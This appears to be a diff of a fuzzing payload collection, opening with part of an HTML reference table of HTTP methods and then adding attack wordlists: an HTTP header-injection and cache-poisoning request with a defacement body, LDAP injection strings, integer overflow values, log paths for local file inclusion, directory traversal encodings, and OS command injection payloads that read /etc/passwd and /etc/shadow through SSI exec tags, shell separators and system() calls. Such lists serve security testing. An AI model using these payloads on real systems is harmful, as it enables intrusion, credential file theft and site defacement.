|
||||
<p class=doctext>Host: <span class=docemphasis1><hostname or IP address of
|
||||
host></span>\r\n</p>
|
||||
<p class=doctext>Content-Length: <span class=docemphasis1><length in
|
||||
bytes></span>\r\n</p>
|
||||
<p class=doctext>Content-Type: <span class=docemphasis1><content type></span>\r\n\r\n</p>
|
||||
<p class=doctext><span class=docemphasis1><query_string or other data to
|
||||
post to Request-URI></span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>The POST method is used to submit data to the resource located
|
||||
at the specified Request-URI. Typically, the resource located at the
|
||||
specified Request-URI is a server-side script or CGI program designed to
|
||||
processes form data. When HTML form variables are submitted with the form
|
||||
action set to POST, the form parameters are encoded and submitted to the HTTP
|
||||
server as the body of the POST request message. </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>HEAD </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>HEAD <span class=docemphasis1><Request-URI></span>
|
||||
HTTP/1.1\r\n</p>
|
||||
<p class=doctext>Host: <span class=docemphasis1><hostname or IP address of
|
||||
host></span>\r\n\r\n</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>"The HEAD method is identical to the GET method except that
|
||||
an HTTP 1.1 server should not return a message-body in the response. The
|
||||
meta-information contained in the HTTP headers in response to a HEAD request
|
||||
should be identical to the information sent in response to a GET request.
|
||||
This method can be used for obtaining meta-information about the entity
|
||||
implied by the request without transferring the entity-body itself. This
|
||||
method is often used for testing hypertext links for validity, accessibility,
|
||||
and recent modification."—Section 9.4, RFC 2616. </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>PUT </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>PUT <span class=docemphasis1><Request-URI></span>
|
||||
HTTP/1.1\r\n</p>
|
||||
<p class=doctext>Host: <span class=docemphasis1><hostname or IP address of
|
||||
host></span>\r\n</p>
|
||||
<p class=doctext>Content-Length: <span class=docemphasis1><length in
|
||||
bytes></span>\r\n</p>
|
||||
<p class=doctext>Content-Type: <span class=docemphasis1><content type></span>\r\n\r\n</p>
|
||||
<p class=doctext><span class=docemphasis1><data to put to file></span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>The PUT method allows for data to be transferred to an HTTP
|
||||
server and stored at the location identified by the Request-URI. </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>OPTIONS </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>OPTIONS <span class=docemphasis1><Request-URI></span>
|
||||
HTTP/1.1\r\n</p>
|
||||
<p class=doctext>Host: <span class=docemphasis1><hostname or IP address of
|
||||
host></span>\r\n\r\n</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>"The OPTIONS method represents a request for information
|
||||
about the communication options available on the request/response chain
|
||||
identified by the Request-URI." —Section 9.2, RFC 2616. </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>DELETE </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>DELETE <span class=docemphasis1><Request-URI></span>
|
||||
HTTP/1.1\r\n</p>
|
||||
<p class=doctext>Host: <span class=docemphasis1><hostname or IP address of
|
||||
host></span>\r\n\r\n</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>"The DELETE method requests that the origin server delete
|
||||
the resource identified by the Request-URI."—Section 9.7, RFC 2616. </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>TRACE </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>TRACE <span class=docemphasis1><Request-URI></span>
|
||||
HTTP/1.1\r\n</p>
|
||||
<p class=doctext>Host: <span class=docemphasis1><hostname or IP address of
|
||||
host></span>\r\n\r\n</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>"The TRACE method is used to invoke a remote,
|
||||
application-layer loop-back of the request message…. TRACE allows the client
|
||||
to see what is being received at the other end of the request chain and use
|
||||
that data for testing and diagnostic information."—Section 9.8, RFC
|
||||
2616. </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>CONNECT </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext>CONNECT <span class=docemphasis1><Request-URI></span>
|
||||
HTTP/1.1\r\n</p>
|
||||
<p class=doctext>Host: <span class=docemphasis1><hostname or IP address of
|
||||
host></span>\r\n\r\n</p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>The CONNECT message type is used to specify a proxy connection
|
||||
to the resource identified by the Request-URI. </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
</COLGROUP>
|
||||
</table>
|
||||
|
||||
<p style='margin:0cm;margin-bottom:.0001pt'><a name=app02table02></a><span
|
||||
style='color:black;display:none'> </span></p>
|
||||
|
||||
<table class=MsoNormalTable border=1 cellspacing=0 cellpadding=0 width="100%"
|
||||
style='width:100.0%'>
|
||||
<tr>
|
||||
<td colspan=3 style='border:none;padding:.75pt .75pt .75pt .75pt'>
|
||||
<h5 align=center style='text-align:center'><span style='font-size:10.5pt;
|
||||
font-family:Arial'>Table B-2. HTTP/1.0 Methods and Field Definitions</span></h5>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>Method</span></b></span><b><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>Request</span></b></span><b><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>Definition</span></b></span><b><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>GET <span class=docemphasis1><Request-URI>?query_string</span>
|
||||
HTTP/1.1\r\n\r\n </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>The GET method is used to retrieve whatever is stored or
|
||||
produced by the resource located at the specified Request-URI. The GET method
|
||||
can be used to request files, to invoke server-side scripts, to interact with
|
||||
server-side CGI programs, and more. When HTML form variables are submitted with
|
||||
the form action set to GET, the form parameters are encoded in a query string
|
||||
and submitted to the HTTP server as part of the Request-URI using the GET
|
||||
request method. </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>POST </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=doctext><span lang=EN-GB>POST <span class=docemphasis1><Request-URI></span>
|
||||
HTTP/1.1\r\n\</span></p>
|
||||
<p class=doctext><span lang=EN-GB>Content-Length: <span class=docemphasis1><length
|
||||
in bytes></span>\r\n</span></p>
|
||||
<p class=doctext><span lang=EN-GB>Content-Type: <span class=docemphasis1><content
|
||||
type></span>\r\n\r\n</span></p>
|
||||
<p class=doctext><span class=docemphasis1><span lang=EN-GB><query_string
|
||||
or other data to post to Request-URI></span></span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span lang=EN-GB style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>The POST method is used to submit data to the resource located
|
||||
at the specified Request-URI. Typically, the resource located at the
|
||||
specified Request-URI is a server-side script or CGI program designed to
|
||||
processes form data. When HTML form variables are submitted with the form
|
||||
action set to POST, the form parameters are encoded and submitted to the HTTP
|
||||
server as the body of the POST request message. </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>HEAD </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span lang=EN-GB style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>HEAD <span class=docemphasis1><Request-URI></span>
|
||||
HTTP/1.1\r\n\r\n </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span lang=EN-GB style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>"The HEAD method is identical to the GET method except that
|
||||
an HTTP 1.1 server should not return a message-body in the response. The
|
||||
meta-information contained in the HTTP headers in response to a HEAD request
|
||||
should be identical to the information sent in response to a GET request. This
|
||||
method can be used for obtaining meta-information about the entity implied by
|
||||
the request without transferring the entity-body itself. This method is often
|
||||
used for testing hypertext links for validity, accessibility, and recent
|
||||
modification."—Section 9.4, RFC 2616. </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
</COLGROUP>
|
||||
</table>
|
||||
|
||||
<p style='margin:0cm;margin-bottom:.0001pt'><a name=app02table03></a><span
|
||||
style='color:black;display:none'> </span></p>
|
||||
|
||||
<table class=MsoNormalTable border=1 cellspacing=0 cellpadding=0 width="100%"
|
||||
style='width:100.0%'>
|
||||
<tr>
|
||||
<td colspan=3 style='border:none;padding:.75pt .75pt .75pt .75pt'>
|
||||
<h5 align=center style='text-align:center'><span lang=EN-GB style='font-size:
|
||||
10.5pt;font-family:Arial'>Table B-3. HTTP/1.0 Undefined Method Description as
|
||||
Found in </span><span style='font-size:10.5pt;font-family:Arial'><a
|
||||
href="http:// /?xmlid=0-201-76176-9/app04#app04"><span
|
||||
lang=EN-GB style='color:#003399'>Appendix D</span></a></span><span
|
||||
lang=EN-GB style='font-size:10.5pt;font-family:Arial'> of RFC 1945.</span></h5>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>Method</span></b></span><b><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>Request</span></b></span><b><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span class=docemphasis1><b><span style='font-size:10.5pt;
|
||||
font-family:Arial;color:black'>Definition</span></b></span><b><span
|
||||
style='font-size:10.5pt;font-family:Arial;color:black'> </span></b></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>PUT </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>The PUT message format is not defined in RFC 1945. In practice,
|
||||
the PUT message format is the same as for HTTP 1.1. </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>The PUT method allows for data to be transferred to an HTTP
|
||||
server and stored at the location identified by the Request-URI. </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>DELETE </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>The DELETE message format is not defined in RFC 1945. In
|
||||
practice, the DELETE message format is the same as for HTTP 1.1. </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>"The DELETE method requests that the origin server delete
|
||||
the resource identified by the Request-URI."— Appendix D.1, Section
|
||||
D.1.2, RFC 1945. </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>LINK </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>The LINK message format is not defined in RFC 1945 and is not
|
||||
implemented by most/all HTTP 1.0 implementations. </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>"The LINK method establishes one or more Link relationships
|
||||
between the existing resource identified by the Request-URI and other
|
||||
existing resources."— Appendix D.1, Section D.1.3, RFC 1945. </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>UNLINK </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>The UNLINK message format is not defined in RFC 1945 and is not
|
||||
implemented by most/all HTTP 1.0 implementations. </span></p>
|
||||
</td>
|
||||
<td valign=top style='padding:.75pt .75pt .75pt .75pt'>
|
||||
<p class=MsoNormal><span style='font-size:10.5pt;font-family:Arial;
|
||||
color:black'>"The UNLINK method removes one or more Link relationships
|
||||
from the existing resource identified by the Request-URI."— Appendix
|
||||
D.1, Section D.1.4, RFC 1945. </span></p>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
<p class=MsoNormal> </p>
|
||||
|
||||
</div>
|
||||
|
||||
<!--504690132--><br></body>
|
||||
|
||||
</html>
|
||||
|
|
@ -0,0 +1,5 @@
|
|||
# Header Injection / Cache Poison 1.0 (fuzz the entire get req) (12 April 2010)
|
||||
# creative commons license http://creativecommons.org/licenses/by/3.0/
|
||||
# projurl
|
||||
GET http://{SITE}testsite.com/redir.php?site=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified:%20Mon,%2027%20Oct%202009%2014:50:18%20GMT%0d%0aContent-Length:%2020%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<html>deface!</html> HTTP/1.1GET http://{SITE}/{REDIRECTURL}?site=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aLast-Modified:%20Mon,%2027%20Oct%202009%2014:50:18%20GMT%0d%0aContent-Length:%2020%0d%0aContent-Type:%20text/html%0d%0a%0d%0a<html>deface!</html> HTTP/1.1
|
||||
%0d%0aX-Injection-Header:%20AttackValue
|
33
attack-payloads/http-protocol/http-protocol-methods.txt
Normal file
33
attack-payloads/http-protocol/http-protocol-methods.txt
Normal file
|
@ -0,0 +1,33 @@
|
|||
# All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb 1.0 - (Update: 16 March 2010)
|
||||
# creative commons
|
||||
OPTIONS
|
||||
GET
|
||||
HEAD
|
||||
POST
|
||||
PUT
|
||||
DELETE
|
||||
TRACE
|
||||
CONNECT
|
||||
PROPFIND
|
||||
PROPPATCH
|
||||
MKCOL
|
||||
COPY
|
||||
MOVE
|
||||
LOCK
|
||||
UNLOCK
|
||||
VERSION-CONTROL
|
||||
REPORT
|
||||
CHECKOUT
|
||||
CHECKIN
|
||||
UNCHECKOUT
|
||||
MKWORKSPACE
|
||||
UPDATE
|
||||
LABEL
|
||||
MERGE
|
||||
BASELINE-CONTROL
|
||||
MKACTIVITY
|
||||
ORDERPATCH
|
||||
ACL
|
||||
PATCH
|
||||
SEARCH
|
||||
ARBITRARY
|
30
attack-payloads/http-protocol/user-agents.txt
Normal file
30
attack-payloads/http-protocol/user-agents.txt
Normal file
|
@ -0,0 +1,30 @@
|
|||
# List of user agents from jbrofuzz (13 april 2010)
|
||||
User-Agent: Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)
|
||||
User-Agent: Mozilla/2.0 (compatible; MSIE 3.02; Update a; Windows NT)
|
||||
User-Agent: Mozilla/4.0 (compatible; MSIE 4.01; Windows NT)
|
||||
User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)
|
||||
User-Agent: Mozilla/4.79 [en] (WinNT; U)
|
||||
User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:0.9.2) Gecko/20010726 Netscape6/6.1
|
||||
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.4) Gecko/2008102920 Firefox/3.0.4
|
||||
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
|
||||
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.19) Gecko/20081204 SeaMonkey/1.1.14
|
||||
User-Agent: Mozilla/5.0 (SymbianOS/9.2; U; Series60/3.1 NokiaE90-1/210.34.75 Profile/MIDP-2.0 Configuration/CLDC-1.1 ) AppleWebKit/413 (KHTML, like Gecko) Safari/413
|
||||
User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 2_2 like Mac OS X; en-us) AppleWebKit/525.18.1 (KHTML, like Gecko) Version/3.1.1 Mobile/5G77 Safari/525.20
|
||||
User-Agent: Mozilla/5.0 (Linux; U; Android 1.5; en-gb; HTC Magic Build/CRB17) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1
|
||||
User-Agent: Opera/9.27 (Windows NT 5.1; U; en)
|
||||
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.27.1 (KHTML, like Gecko) Version/3.2.1 Safari/525.27.1
|
||||
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)
|
||||
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.4.154.25 Safari/525.19
|
||||
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.48 Safari/525.19
|
||||
User-Agent: Wget/1.8.2
|
||||
User-Agent: Mozilla/5.0 (PLAYSTATION 3; 1.00)
|
||||
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; (R1 1.6))
|
||||
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.1.1) Gecko/20061204 Firefox/2.0.0.1
|
||||
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 (.NET CLR 3.5.30729) JBroFuzz/1.4
|
||||
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)
|
||||
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.12) Gecko/20050923 CentOS/1.0.7-1.4.1.centos4 Firefox/1.0.7
|
||||
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727)
|
||||
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.5) Gecko/2008120122 Firefox/3.0.5
|
||||
User-Agent: Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.7) Gecko/20070606
|
||||
User-Agent: Mozilla/5.0 (X11; U; SunOS i86pc; en-US; rv:1.8.1.14) Gecko/20080520 Firefox/2.0.0.14
|
||||
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.5; en-US; rv:1.9.0.5) Gecko/2008120121 Firefox/3.0.5
|
13
attack-payloads/integer-overflow/integer-overflows.txt
Normal file
13
attack-payloads/integer-overflow/integer-overflows.txt
Normal file
|
@ -0,0 +1,13 @@
|
|||
# integer overflows from jbrofuzz
|
||||
-1
|
||||
0
|
||||
0x100
|
||||
0x1000
|
||||
0x3fffffff
|
||||
0x7ffffffe
|
||||
0x7fffffff
|
||||
0x80000000
|
||||
0xfffffffe
|
||||
0xffffffff
|
||||
0x10000
|
||||
0x100000
|
26
attack-payloads/ldap/ldap-injection.txt
Normal file
26
attack-payloads/ldap/ldap-injection.txt
Normal file
|
@ -0,0 +1,26 @@
|
|||
!
|
||||
%21
|
||||
%26
|
||||
%28
|
||||
%29
|
||||
%2A%28%7C%28mail%3D%2A%29%29
|
||||
%2A%28%7C%28objectclass%3D%2A%29%29
|
||||
%2A%7C
|
||||
%7C
|
||||
&
|
||||
(
|
||||
)
|
||||
*(|(mail=*))
|
||||
*(|(objectclass=*))
|
||||
*/*
|
||||
*|
|
||||
/
|
||||
//
|
||||
//*
|
||||
@*
|
||||
x' or name()='username' or 'x'='y
|
||||
|
|
||||
*()|&'
|
||||
admin*
|
||||
admin*)((|userpassword=*)
|
||||
*)(uid=*))(|(uid=*
|
31
attack-payloads/lfi/common-unix-httpd-log-locations.txt
Normal file
31
attack-payloads/lfi/common-unix-httpd-log-locations.txt
Normal file
|
@ -0,0 +1,31 @@
|
|||
# based on list by Joseph Giron http://www.wtfchan.org/~evil1/Web-Shells-rev2.pdf
|
||||
/apache/logs/error.log
|
||||
/apache/logs/access.log
|
||||
/apache/logs/error.log
|
||||
/apache/logs/access.log
|
||||
/apache/logs/error.log
|
||||
/apache/logs/access.log
|
||||
/etc/httpd/logs/acces_log
|
||||
/etc/httpd/logs/acces.log
|
||||
/etc/httpd/logs/error_log
|
||||
/etc/httpd/logs/error.log
|
||||
/var/www/logs/access_log
|
||||
/var/www/logs/access.log
|
||||
/usr/local/apache/logs/access_log
|
||||
/usr/local/apache/logs/access.log
|
||||
/var/log/apache/access_log
|
||||
/var/log/apache2/access_log
|
||||
/var/log/apache/access.log
|
||||
/var/log/apache2/access.log
|
||||
/var/log/access_log
|
||||
/var/log/access.log
|
||||
/var/www/logs/error_log
|
||||
/var/www/logs/error.log
|
||||
/usr/local/apache/logs/error_log
|
||||
/usr/local/apache/logs/error.log
|
||||
/var/log/apache/error_log
|
||||
/var/log/apache2/error_log
|
||||
/var/log/apache/error.log
|
||||
/var/log/apache2/error.log
|
||||
/var/log/error_log
|
||||
/var/log/error.log
|
3
attack-payloads/lfi/readme.txt
Normal file
3
attack-payloads/lfi/readme.txt
Normal file
|
@ -0,0 +1,3 @@
|
|||
other tools:
|
||||
|
||||
fimap http://code.google.com/p/fimap/
|
69
attack-payloads/os-cmd-execution/command-execution-unix.txt
Normal file
69
attack-payloads/os-cmd-execution/command-execution-unix.txt
Normal file
|
@ -0,0 +1,69 @@
|
|||
<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
|
||||
<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
|
||||
<!--#exec%20cmd="/usr/bin/id;-->
|
||||
<!--#exec%20cmd="/usr/bin/id;-->
|
||||
/index.html|id|
|
||||
;id;
|
||||
;id
|
||||
;netstat -a;
|
||||
;id;
|
||||
|id
|
||||
|/usr/bin/id
|
||||
|id|
|
||||
|/usr/bin/id|
|
||||
||/usr/bin/id|
|
||||
|id;
|
||||
||/usr/bin/id;
|
||||
;id|
|
||||
;|/usr/bin/id|
|
||||
\n/bin/ls -al\n
|
||||
\n/usr/bin/id\n
|
||||
\nid\n
|
||||
\n/usr/bin/id;
|
||||
\nid;
|
||||
\n/usr/bin/id|
|
||||
\nid|
|
||||
;/usr/bin/id\n
|
||||
;id\n
|
||||
|usr/bin/id\n
|
||||
|nid\n
|
||||
`id`
|
||||
`/usr/bin/id`
|
||||
a);id
|
||||
a;id
|
||||
a);id;
|
||||
a;id;
|
||||
a);id|
|
||||
a;id|
|
||||
a)|id
|
||||
a|id
|
||||
a)|id;
|
||||
a|id
|
||||
|/bin/ls -al
|
||||
a);/usr/bin/id
|
||||
a;/usr/bin/id
|
||||
a);/usr/bin/id;
|
||||
a;/usr/bin/id;
|
||||
a);/usr/bin/id|
|
||||
a;/usr/bin/id|
|
||||
a)|/usr/bin/id
|
||||
a|/usr/bin/id
|
||||
a)|/usr/bin/id;
|
||||
a|/usr/bin/id
|
||||
;system('cat%20/etc/passwd')
|
||||
;system('id')
|
||||
;system('/usr/bin/id')
|
||||
%0Acat%20/etc/passwd
|
||||
%0A/usr/bin/id
|
||||
%0Aid
|
||||
%0A/usr/bin/id%0A
|
||||
%0Aid%0A
|
||||
& ping -i 30 127.0.0.1 &
|
||||
& ping -n 30 127.0.0.1 &
|
||||
%0a ping -i 30 127.0.0.1 %0a
|
||||
`ping 127.0.0.1`
|
||||
| id
|
||||
& id
|
||||
; id
|
||||
%0a id %0a
|
||||
`id`
|
11
attack-payloads/os-cmd-execution/commands-unix.txt
Normal file
11
attack-payloads/os-cmd-execution/commands-unix.txt
Normal file
|
@ -0,0 +1,11 @@
|
|||
# list of potentially useful unix commands to fuzz inside an os command execution bug
|
||||
uname -n -s
|
||||
whoami
|
||||
pwd
|
||||
last
|
||||
cat /etc/passwd
|
||||
ls -la /tmp
|
||||
ls -la /home
|
||||
ping -i 30 127.0.0.1
|
||||
ping 127.0.0.1
|
||||
ping -n 30
|
4
attack-payloads/os-cmd-execution/commands-windows.txt
Normal file
4
attack-payloads/os-cmd-execution/commands-windows.txt
Normal file
|
@ -0,0 +1,4 @@
|
|||
# list of potentially useful dos commands to fuzz inside an os command execution bug
|
||||
ver
|
||||
chdir
|
||||
echo %USERNAME%
|
|
@ -0,0 +1,8 @@
|
|||
# single directory traversals that have caused showcode or command exec issues in the past
|
||||
# GET /path/*payload*relative/path/to/target/file/
|
||||
..%255c
|
||||
.%5c../..%5c
|
||||
/..%c0%9v../
|
||||
/..%c0%af../
|
||||
/..%255c..%255c
|
||||
|
7
attack-payloads/os-dir-indexing/directory-indexing.txt
Normal file
7
attack-payloads/os-dir-indexing/directory-indexing.txt
Normal file
|
